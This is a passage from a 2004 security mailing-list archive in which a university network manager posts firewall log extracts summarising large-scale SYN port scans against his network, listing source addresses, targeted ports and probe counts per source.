SYN ******S* Jul 2 08:25:21 212.234.232.145:4441 -> xxx.yyy.1.6:1433 SYN ******S* Jul 2 08:25:21 212.234.232.145:4442 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 2 10:23:09 212.234.232.145:4178 -> xxx.yyy.132.13:1433 SYN ******S* Jul 2 10:23:09 212.234.232.145:4177 -> xxx.yyy.132.12:1433 SYN ******S* Jul 2 10:23:09 212.234.232.145:4176 -> xxx.yyy.132.11:1433 SYN ******S* Jul 2 10:23:09 212.234.232.145:4174 -> xxx.yyy.132.10:1433 SYN ******S* Jul 2 10:23:09 212.234.232.145:4173 -> xxx.yyy.132.9:1433 SYN ******S* Jul 2 10:23:09 212.234.232.145:4252 -> xxx.yyy.132.17:1433 SYN ******S* Jul 2 10:23:09 212.234.232.145:4254 -> xxx.yyy.132.18:1433 SYN ******S* Jul 2 10:23:09 212.234.232.145:4256 -> xxx.yyy.132.19:1433 SYN ******S* Jul 2 10:23:09 212.234.232.145:4259 -> xxx.yyy.132.20:1433 SYN ******S* 36744 Jul 2 04:16:51 81.208.74.191:65187 -> xxx.yyy.1.1:8000 SYN ******S* Jul 2 04:16:51 81.208.74.191:65189 -> xxx.yyy.1.2:8000 SYN ******S* Jul 2 04:16:51 81.208.74.191:65192 -> xxx.yyy.1.3:8000 SYN ******S* Jul 2 04:16:51 81.208.74.191:65193 -> xxx.yyy.1.4:8000 SYN ******S* Jul 2 04:16:54 81.208.74.191:65194 -> xxx.yyy.1.5:8000 SYN ******S* Jul 2 04:16:51 81.208.74.191:65195 -> xxx.yyy.1.6:8000 SYN ******S* Jul 2 04:16:54 81.208.74.191:65201 -> xxx.yyy.1.7:8000 SYN ******S* Jul 2 04:16:54 81.208.74.191:65202 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 2 04:28:45 81.208.74.191:51811 -> xxx.yyy.255.245:8000 SYN ******S* Jul 2 04:28:45 81.208.74.191:51813 -> xxx.yyy.255.246:8000 SYN ******S* Jul 2 04:28:45 81.208.74.191:51814 -> xxx.yyy.255.247:8000 SYN ******S* Jul 2 04:28:45 81.208.74.191:51815 -> xxx.yyy.255.248:8000 SYN ******S* Jul 2 04:28:45 81.208.74.191:51816 -> xxx.yyy.255.249:8000 SYN ******S* Jul 2 04:28:45 81.208.74.191:51817 -> xxx.yyy.255.250:8000 SYN ******S* Jul 2 04:28:46 81.208.74.191:51820 -> xxx.yyy.255.253:8000 SYN ******S* Jul 2 04:28:46 81.208.74.191:51821 -> xxx.yyy.255.254:8000 SYN ******S* 31944 [...] 25151 Jul 2 06:47:41 209.88.22.202:1813 -> xxx.yyy.32.0:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1814 -> xxx.yyy.32.1:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1815 -> xxx.yyy.32.2:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1816 -> xxx.yyy.32.3:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1817 -> xxx.yyy.32.4:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1818 -> xxx.yyy.32.5:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1819 -> xxx.yyy.32.6:1433 SYN ******S* Jul 2 06:47:41 209.88.22.202:1820 -> xxx.yyy.32.7:1433 SYN ******S* [...] Jul 2 07:44:54 209.88.22.202:52663 -> xxx.yyy.95.240:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52671 -> xxx.yyy.95.248:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52672 -> xxx.yyy.95.249:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52674 -> xxx.yyy.95.251:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52673 -> xxx.yyy.95.250:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52676 -> xxx.yyy.95.253:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52675 -> xxx.yyy.95.252:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52678 -> xxx.yyy.95.255:1433 SYN ******S* Jul 2 07:44:55 209.88.22.202:52677 -> xxx.yyy.95.254:1433 SYN ******S* 22632 Jul 2 06:56:04 213.143.118.98:4142 -> xxx.yyy.214.246:5554 SYN ******S* Jul 2 06:56:05 213.143.118.98:1039 -> xxx.yyy.214.246:1023 SYN ******S* Jul 2 06:56:07 213.143.118.98:1908 -> xxx.yyy.214.246:9898 SYN ******S* Jul 2 06:56:04 213.143.118.98:4143 -> xxx.yyy.214.247:5554 SYN ******S* Jul 2 06:56:05 213.143.118.98:1040 -> xxx.yyy.214.247:1023 SYN ******S* Jul 2 06:56:07 213.143.118.98:1909 -> xxx.yyy.214.247:9898 SYN ******S* Jul 2 06:56:04 213.143.118.98:4144 -> xxx.yyy.214.248:5554 SYN ******S* Jul 2 06:56:05 213.143.118.98:1047 -> xxx.yyy.214.248:1023 SYN ******S* [...] Jul 2 06:56:48 213.143.118.98:1908 -> xxx.yyy.235.105:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1909 -> xxx.yyy.235.106:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1910 -> xxx.yyy.235.107:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1913 -> xxx.yyy.235.110:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1911 -> xxx.yyy.235.108:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1915 -> xxx.yyy.235.112:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1912 -> xxx.yyy.235.109:9898 SYN ******S* Jul 2 06:56:48 213.143.118.98:1914 -> xxx.yyy.235.111:9898 SYN ******S* 15271 Jul 2 01:02:12 221.201.48.15:3013 -> xxx.yyy.174.223:5554 SYN ******S* Jul 2 01:02:13 221.201.48.15:3224 -> xxx.yyy.174.223:1023 SYN ******S* Jul 2 01:02:15 221.201.48.15:3605 -> xxx.yyy.174.223:9898 SYN ******S* Jul 2 01:02:12 221.201.48.15:3014 -> xxx.yyy.174.224:5554 SYN ******S* Jul 2 01:02:13 221.201.48.15:3225 -> xxx.yyy.174.224:1023 SYN ******S* Jul 2 01:02:15 221.201.48.15:3606 -> xxx.yyy.174.224:9898 SYN ******S* Jul 2 01:02:12 221.201.48.15:3015 -> xxx.yyy.174.225:5554 SYN ******S* Jul 2 01:02:13 221.201.48.15:3226 -> xxx.yyy.174.225:1023 SYN ******S* [...] Jul 2 01:04:02 221.201.48.15:1467 -> xxx.yyy.176.69:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1468 -> xxx.yyy.176.74:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1466 -> xxx.yyy.176.63:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1471 -> xxx.yyy.176.75:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1487 -> xxx.yyy.176.76:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1489 -> xxx.yyy.176.84:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1488 -> xxx.yyy.176.78:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1490 -> xxx.yyy.176.85:9898 SYN ******S* Jul 2 01:04:02 221.201.48.15:1491 -> xxx.yyy.176.86:9898 SYN ******S* 15113 Jul 2 00:31:54 218.12.17.75:2212 -> xxx.yyy.153.136:5554 SYN ******S* Jul 2 00:31:55 218.12.17.75:2396 -> xxx.yyy.153.136:1023 SYN ******S* Jul 2 00:31:57 218.12.17.75:2814 -> xxx.yyy.153.136:9898 SYN ******S* Jul 2 00:31:54 218.12.17.75:2213 -> xxx.yyy.153.137:5554 SYN ******S* Jul 2 00:31:55 218.12.17.75:2397 -> xxx.yyy.153.137:1023 SYN ******S* Jul 2 00:31:57 218.12.17.75:2815 -> xxx.yyy.153.137:9898 SYN ******S* Jul 2 00:31:54 218.12.17.75:2215 -> xxx.yyy.153.139:5554 SYN ******S* Jul 2 00:31:55 218.12.17.75:2399 -> xxx.yyy.153.139:1023 SYN ******S* [...] Jul 2 00:33:40 218.12.17.75:4944 -> xxx.yyy.173.250:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4949 -> xxx.yyy.173.252:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4947 -> xxx.yyy.173.251:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4952 -> xxx.yyy.173.253:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4955 -> xxx.yyy.173.254:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4962 -> xxx.yyy.174.2:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4958 -> xxx.yyy.173.255:9898 SYN ******S* Jul 2 00:33:40 218.12.17.75:4959 -> xxx.yyy.174.0:9898 SYN ******S* 12861 Jul 2 00:56:28 221.192.67.236:4280 -> xxx.yyy.235.134:5554 SYN ******S* Jul 2 00:56:29 221.192.67.236:1088 -> xxx.yyy.235.134:1023 SYN ******S* Jul 2 00:56:30 221.192.67.236:2200 -> xxx.yyy.235.134:9898 SYN ******S* Jul 2 00:56:28 221.192.67.236:4282 -> xxx.yyy.235.132:5554 SYN ******S* Jul 2 00:56:29 221.192.67.236:1090 -> xxx.yyy.235.132:1023 SYN ******S* Jul 2 00:56:30 221.192.67.236:2203 -> xxx.yyy.235.132:9898 SYN ******S* Jul 2 00:56:28 221.192.67.236:4293 -> xxx.yyy.235.130:5554 SYN ******S* Jul 2 00:56:29 221.192.67.236:1094 -> xxx.yyy.235.130:1023 SYN ******S* [...] Jul 2 00:58:08 221.192.67.236:3245 -> xxx.yyy.255.229:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3242 -> xxx.yyy.255.226:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3243 -> xxx.yyy.255.227:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3252 -> xxx.yyy.255.232:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3248 -> xxx.yyy.255.230:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3253 -> xxx.yyy.255.233:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3250 -> xxx.yyy.255.231:9898 SYN ******S* Jul 2 00:58:08 221.192.67.236:3254 -> xxx.yyy.255.234:9898 SYN ******S* 11993 Jul 2 00:56:29 61.51.215.97:3484 -> xxx.yyy.71.160:5554 SYN ******S* Jul 2 00:56:30 61.51.215.97:3821 -> xxx.yyy.71.160:1023 SYN ******S* Jul 2 00:56:32 61.51.215.97:4720 -> xxx.yyy.71.160:9898 SYN ******S* Jul 2 00:56:29 61.51.215.97:3485 -> xxx.yyy.71.161:5554 SYN ******S* Jul 2 00:56:30 61.51.215.97:3822 -> xxx.yyy.71.161:1023 SYN ******S* Jul 2 00:56:32 61.51.215.97:4689 -> xxx.yyy.71.161:9898 SYN ******S* Jul 2 00:56:29 61.51.215.97:3487 -> xxx.yyy.71.165:5554 SYN ******S* Jul 2 00:56:30 61.51.215.97:3826 -> xxx.yyy.71.165:1023 SYN ******S* [...] Jul 2 00:57:35 61.51.215.97:1221 -> xxx.yyy.91.185:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1219 -> xxx.yyy.91.183:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1222 -> xxx.yyy.91.186:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1227 -> xxx.yyy.91.187:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1230 -> xxx.yyy.91.188:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1401 -> xxx.yyy.91.223:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1399 -> xxx.yyy.91.221:9898 SYN ******S* Jul 2 00:57:35 61.51.215.97:1402 -> xxx.yyy.91.224:9898 SYN ******S* Jul 2 00:57:36 61.51.215.97:1535 -> xxx.yyy.92.2:9898 SYN ******S* 11469 Jul 2 00:56:57 61.50.245.72:2837 -> xxx.yyy.195.123:5554 SYN ******S* Jul 2 00:56:58 61.50.245.72:3330 -> xxx.yyy.195.123:1023 SYN ******S* Jul 2 00:57:00 61.50.245.72:4390 -> xxx.yyy.195.123:9898 SYN ******S* Jul 2 00:56:57 61.50.245.72:2839 -> xxx.yyy.195.125:5554 SYN ******S* Jul 2 00:56:58 61.50.245.72:3354 -> xxx.yyy.195.125:1023 SYN ******S* Jul 2 00:57:00 61.50.245.72:4405 -> xxx.yyy.195.125:9898 SYN ******S* Jul 2 00:56:57 61.50.245.72:2838 -> xxx.yyy.195.124:5554 SYN ******S* Jul 2 00:56:58 61.50.245.72:3331 -> xxx.yyy.195.124:1023 SYN ******S* [...] Jul 2 00:57:44 61.50.245.72:3535 -> xxx.yyy.215.193:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3542 -> xxx.yyy.215.185:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3543 -> xxx.yyy.215.186:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3545 -> xxx.yyy.215.188:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3546 -> xxx.yyy.215.189:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3544 -> xxx.yyy.215.187:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3547 -> xxx.yyy.215.190:9898 SYN ******S* Jul 2 00:57:44 61.50.245.72:3561 -> xxx.yyy.215.191:9898 SYN ******S* 11322 Jul 2 23:14:54 218.75.132.115:3888 -> xxx.yyy.1.2:1433 SYN ******S* Jul 2 23:14:51 218.75.132.115:3892 -> xxx.yyy.1.4:1433 SYN ******S* Jul 2 23:14:51 218.75.132.115:3902 -> xxx.yyy.1.8:1433 SYN ******S* Jul 2 23:14:52 218.75.132.115:3910 -> xxx.yyy.1.12:1433 SYN ******S* Jul 2 23:14:54 218.75.132.115:3886 -> xxx.yyy.1.1:1433 SYN ******S* Jul 2 23:14:52 218.75.132.115:3896 -> xxx.yyy.1.5:1433 SYN ******S* Jul 2 23:14:52 218.75.132.115:3932 -> xxx.yyy.1.20:1433 SYN ******S* Jul 2 23:14:52 218.75.132.115:3900 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 2 23:18:59 218.75.132.115:4317 -> xxx.yyy.94.124:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:3238 -> xxx.yyy.95.162:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:4337 -> xxx.yyy.94.130:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:3173 -> xxx.yyy.95.131:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:3177 -> xxx.yyy.95.133:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:4241 -> xxx.yyy.94.104:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:4226 -> xxx.yyy.94.100:1433 SYN ******S* Jul 2 23:18:59 218.75.132.115:4347 -> xxx.yyy.94.133:1433 SYN ******S* Jul 2 23:19:00 218.75.132.115:3236 -> xxx.yyy.95.161:1433 SYN ******S* 11168 Jul 2 00:56:41 218.61.137.120:4456 -> xxx.yyy.154.100:5554 SYN ******S* Jul 2 00:56:42 218.61.137.120:1407 -> xxx.yyy.154.100:1023 SYN ******S* Jul 2 00:56:44 218.61.137.120:3084 -> xxx.yyy.154.100:9898 SYN ******S* Jul 2 00:56:41 218.61.137.120:4457 -> xxx.yyy.154.101:5554 SYN ******S* Jul 2 00:56:42 218.61.137.120:1409 -> xxx.yyy.154.101:1023 SYN ******S* Jul 2 00:56:44 218.61.137.120:3085 -> xxx.yyy.154.101:9898 SYN ******S* Jul 2 00:56:41 218.61.137.120:4458 -> xxx.yyy.154.102:5554 SYN ******S* Jul 2 00:56:42 218.61.137.120:1410 -> xxx.yyy.154.102:1023 SYN ******S* [...] Jul 2 00:57:25 218.61.137.120:1029 -> xxx.yyy.174.141:9898 SYN ******S* Jul 2 00:57:25 218.61.137.120:1031 -> xxx.yyy.174.142:9898 SYN ******S* Jul 2 00:57:25 218.61.137.120:1477 -> xxx.yyy.174.205:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1480 -> xxx.yyy.174.206:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1481 -> xxx.yyy.174.207:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1486 -> xxx.yyy.174.217:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1488 -> xxx.yyy.174.218:9898 SYN ******S* Jul 2 00:57:26 218.61.137.120:1487 -> xxx.yyy.174.208:9898 SYN ******S* 10856 Jul 2 13:45:32 68.173.228.183:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 2 13:45:33 68.173.228.183:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.253:3128 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.254:3127 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.254:1080 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.254:10080 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.254:3128 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.255:3127 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.255:1080 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.255:10080 SYN ******S* Jul 2 14:20:19 68.173.228.183:22002 -> xxx.yyy.20.255:3128 SYN ******S* 10022 Jul 2 21:02:42 68.163.18.234:4526 -> xxx.yyy.1.0:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4529 -> xxx.yyy.1.1:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4530 -> xxx.yyy.1.2:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4531 -> xxx.yyy.1.3:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4532 -> xxx.yyy.1.4:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4534 -> xxx.yyy.1.5:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4535 -> xxx.yyy.1.6:1433 SYN ******S* Jul 2 21:02:42 68.163.18.234:4539 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 2 21:31:34 68.163.18.234:4067 -> xxx.yyy.32.254:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4050 -> xxx.yyy.32.253:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4049 -> xxx.yyy.32.252:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4047 -> xxx.yyy.32.251:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4041 -> xxx.yyy.32.250:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4025 -> xxx.yyy.32.249:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4020 -> xxx.yyy.32.248:1433 SYN ******S* Jul 2 21:31:34 68.163.18.234:4068 -> xxx.yyy.32.255:1433 SYN ******S* 8442 Jul 2 06:55:04 212.21.233.153:4334 -> xxx.yyy.195.91:5554 SYN ******S* Jul 2 06:55:04 212.21.233.153:1412 -> xxx.yyy.195.88:5554 SYN ******S* Jul 2 06:55:05 212.21.233.153:1412 -> xxx.yyy.195.88:1023 SYN ******S* Jul 2 06:55:04 212.21.233.153:4534 -> xxx.yyy.195.93:5554 SYN ******S* Jul 2 06:55:05 212.21.233.153:4334 -> xxx.yyy.195.93:1023 SYN ******S* Jul 2 06:55:04 212.21.233.153:4204 -> xxx.yyy.195.89:5554 SYN ******S* Jul 2 06:55:05 212.21.233.153:4748 -> xxx.yyy.195.89:1023 SYN ******S* Jul 2 06:55:04 212.21.233.153:3443 -> xxx.yyy.195.94:5554 SYN ******S* [...] Jul 2 06:57:42 212.21.233.153:1560 -> xxx.yyy.213.47:9898 SYN ******S* Jul 2 06:57:42 212.21.233.153:2419 -> xxx.yyy.213.57:9898 SYN ******S* Jul 2 06:57:42 212.21.233.153:2420 -> xxx.yyy.213.58:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:2097 -> xxx.yyy.213.64:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:1750 -> xxx.yyy.213.61:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:1764 -> xxx.yyy.213.62:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:2421 -> xxx.yyy.213.59:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:2435 -> xxx.yyy.213.60:9898 SYN ******S* Jul 2 06:57:43 212.21.233.153:2092 -> xxx.yyy.213.63:9898 SYN ******S* 7952 Jul 2 00:59:22 220.188.73.32:2924 -> xxx.yyy.154.103:5554 SYN ******S* Jul 2 00:59:23 220.188.73.32:3427 -> xxx.yyy.154.103:1023 SYN ******S* Jul 2 00:59:22 220.188.73.32:2926 -> xxx.yyy.154.100:5554 SYN ******S* Jul 2 00:59:23 220.188.73.32:3432 -> xxx.yyy.154.100:1023 SYN ******S* Jul 2 00:59:25 220.188.73.32:4836 -> xxx.yyy.154.100:9898 SYN ******S* Jul 2 00:59:22 220.188.73.32:2928 -> xxx.yyy.154.105:5554 SYN ******S* Jul 2 00:59:22 220.188.73.32:2929 -> xxx.yyy.154.104:5554 SYN ******S* Jul 2 00:59:25 220.188.73.32:4835 -> xxx.yyy.154.104:9898 SYN ******S* [...] Jul 2 01:00:07 220.188.73.32:2502 -> xxx.yyy.154.134:9898 SYN ******S* Jul 2 01:00:07 220.188.73.32:2531 -> xxx.yyy.154.139:9898 SYN ******S* Jul 2 01:00:07 220.188.73.32:2532 -> xxx.yyy.154.140:9898 SYN ******S* Jul 2 01:00:07 220.188.73.32:2533 -> xxx.yyy.154.127:9898 SYN ******S* Jul 2 01:00:07 220.188.73.32:2542 -> xxx.yyy.154.128:9898 SYN ******S* Jul 2 01:00:07 220.188.73.32:2543 -> xxx.yyy.154.131:9898 SYN ******S* Jul 2 01:00:07 220.188.73.32:2545 -> xxx.yyy.154.130:9898 SYN ******S* Jul 2 01:00:07 220.188.73.32:2546 -> xxx.yyy.154.136:9898 SYN ******S* Jul 2 01:00:07 220.188.73.32:2550 -> xxx.yyy.154.141:9898 SYN ******S* 6959 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From Ken.Connelly at uni.edu Sun Jul 4 22:20:29 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Sun, 04 Jul 2004 17:20:29 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LC2KWKDQ7O8YCTMZ@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 3 04:01:24 203.73.34.81:4333 -> xxx.yyy.1.1:139 SYN ******S* Jul 3 04:01:24 203.73.34.81:4334 -> xxx.yyy.1.2:139 SYN ******S* Jul 3 04:01:24 203.73.34.81:4335 -> xxx.yyy.1.3:139 SYN ******S* Jul 3 04:01:24 203.73.34.81:4340 -> xxx.yyy.1.4:139 SYN ******S* Jul 3 04:01:24 203.73.34.81:4341 -> xxx.yyy.1.5:139 SYN ******S* Jul 3 04:01:24 203.73.34.81:4343 -> xxx.yyy.1.6:139 SYN ******S* Jul 3 04:01:24 203.73.34.81:4345 -> xxx.yyy.1.7:139 SYN ******S* Jul 3 04:01:24 203.73.34.81:4348 -> xxx.yyy.1.8:139 SYN ******S* [...] Jul 3 07:50:35 203.73.34.81:3591 -> xxx.yyy.255.246:139 SYN ******S* Jul 3 07:50:35 203.73.34.81:3592 -> xxx.yyy.255.247:139 SYN ******S* Jul 3 07:50:35 203.73.34.81:3593 -> xxx.yyy.255.248:139 SYN ******S* Jul 3 07:50:35 203.73.34.81:3594 -> xxx.yyy.255.249:139 SYN ******S* Jul 3 07:50:35 203.73.34.81:3597 -> xxx.yyy.255.250:139 SYN ******S* Jul 3 07:50:35 203.73.34.81:3603 -> xxx.yyy.255.251:139 SYN ******S* Jul 3 07:50:36 203.73.34.81:3610 -> xxx.yyy.255.252:139 SYN ******S* Jul 3 07:50:36 203.73.34.81:3620 -> xxx.yyy.255.253:139 SYN ******S* Jul 3 07:50:36 203.73.34.81:3621 -> xxx.yyy.255.254:139 SYN ******S* 123686 Jul 3 07:39:32 210.66.60.193:1141 -> xxx.yyy.1.2:139 SYN ******S* Jul 3 07:39:32 210.66.60.193:1142 -> xxx.yyy.1.1:139 SYN ******S* Jul 3 07:39:32 210.66.60.193:1143 -> xxx.yyy.1.3:139 SYN ******S* Jul 3 07:39:32 210.66.60.193:1144 -> xxx.yyy.1.4:139 SYN ******S* Jul 3 07:39:32 210.66.60.193:1146 -> xxx.yyy.1.5:139 SYN ******S* Jul 3 07:39:32 210.66.60.193:1148 -> xxx.yyy.1.6:139 SYN ******S* Jul 3 07:39:32 210.66.60.193:1149 -> xxx.yyy.1.7:139 SYN ******S* Jul 3 07:39:32 210.66.60.193:1151 -> xxx.yyy.1.8:139 SYN ******S* [...] Jul 3 11:29:19 210.66.60.193:2333 -> xxx.yyy.255.247:139 SYN ******S* Jul 3 11:29:19 210.66.60.193:2337 -> xxx.yyy.255.248:139 SYN ******S* Jul 3 11:29:19 210.66.60.193:2338 -> xxx.yyy.255.249:139 SYN ******S* Jul 3 11:29:19 210.66.60.193:2342 -> xxx.yyy.255.250:139 SYN ******S* Jul 3 11:29:19 210.66.60.193:2347 -> xxx.yyy.255.251:139 SYN ******S* Jul 3 11:29:20 210.66.60.193:2352 -> xxx.yyy.255.252:139 SYN ******S* Jul 3 11:29:20 210.66.60.193:2356 -> xxx.yyy.255.253:139 SYN ******S* Jul 3 11:29:20 210.66.60.193:2362 -> xxx.yyy.255.254:139 SYN ******S* 122695 Jul 3 16:43:22 69.70.72.33:2719 -> xxx.yyy.1.0:1433 SYN ******S* Jul 3 16:43:22 69.70.72.33:2722 -> xxx.yyy.1.1:1433 SYN ******S* Jul 3 16:43:22 69.70.72.33:2725 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 16:43:22 69.70.72.33:2730 -> xxx.yyy.1.3:1433 SYN ******S* Jul 3 16:43:22 69.70.72.33:2733 -> xxx.yyy.1.4:1433 SYN ******S* Jul 3 16:43:22 69.70.72.33:2737 -> xxx.yyy.1.5:1433 SYN ******S* Jul 3 16:43:22 69.70.72.33:2740 -> xxx.yyy.1.6:1433 SYN ******S* Jul 3 16:43:22 69.70.72.33:2743 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 3 20:32:37 69.70.72.33:1303 -> xxx.yyy.255.244:1433 SYN ******S* Jul 3 20:32:37 69.70.72.33:1319 -> xxx.yyy.255.248:1433 SYN ******S* Jul 3 20:32:38 69.70.72.33:1564 -> xxx.yyy.255.254:1433 SYN ******S* Jul 3 20:32:41 69.70.72.33:1493 -> xxx.yyy.255.249:1433 SYN ******S* Jul 3 20:32:43 69.70.72.33:1551 -> xxx.yyy.255.250:1433 SYN ******S* Jul 3 20:32:43 69.70.72.33:1553 -> xxx.yyy.255.251:1433 SYN ******S* Jul 3 20:32:43 69.70.72.33:1560 -> xxx.yyy.255.253:1433 SYN ******S* Jul 3 20:32:43 69.70.72.33:1559 -> xxx.yyy.255.252:1433 SYN ******S* Jul 3 20:32:44 69.70.72.33:1564 -> xxx.yyy.255.254:1433 SYN ******S* 122554 Jul 3 07:34:07 218.164.183.126:4746 -> xxx.yyy.1.3:139 SYN ******S* Jul 3 07:34:07 218.164.183.126:4740 -> xxx.yyy.1.2:139 SYN ******S* Jul 3 07:34:04 218.164.183.126:4749 -> xxx.yyy.1.4:139 SYN ******S* Jul 3 07:34:07 218.164.183.126:4751 -> xxx.yyy.1.5:139 SYN ******S* Jul 3 07:34:07 218.164.183.126:4760 -> xxx.yyy.1.1:139 SYN ******S* Jul 3 07:34:04 218.164.183.126:4770 -> xxx.yyy.1.7:139 SYN ******S* Jul 3 07:34:04 218.164.183.126:4775 -> xxx.yyy.1.9:139 SYN ******S* Jul 3 07:34:07 218.164.183.126:4766 -> xxx.yyy.1.6:139 SYN ******S* [...] Jul 3 11:25:27 218.164.183.126:2166 -> xxx.yyy.255.247:139 SYN ******S* Jul 3 11:25:27 218.164.183.126:2167 -> xxx.yyy.255.248:139 SYN ******S* Jul 3 11:25:28 218.164.183.126:2169 -> xxx.yyy.255.250:139 SYN ******S* Jul 3 11:25:28 218.164.183.126:2168 -> xxx.yyy.255.249:139 SYN ******S* Jul 3 11:25:28 218.164.183.126:2176 -> xxx.yyy.255.251:139 SYN ******S* Jul 3 11:25:28 218.164.183.126:2177 -> xxx.yyy.255.252:139 SYN ******S* Jul 3 11:25:28 218.164.183.126:2179 -> xxx.yyy.255.253:139 SYN ******S* Jul 3 11:25:28 218.164.183.126:2182 -> xxx.yyy.255.254:139 SYN ******S* 119916 Jul 3 13:36:34 4.47.246.208:62811 -> xxx.yyy.1.0:139 SYN ******S* Jul 3 13:36:34 4.47.246.208:62495 -> xxx.yyy.1.1:139 SYN ******S* Jul 3 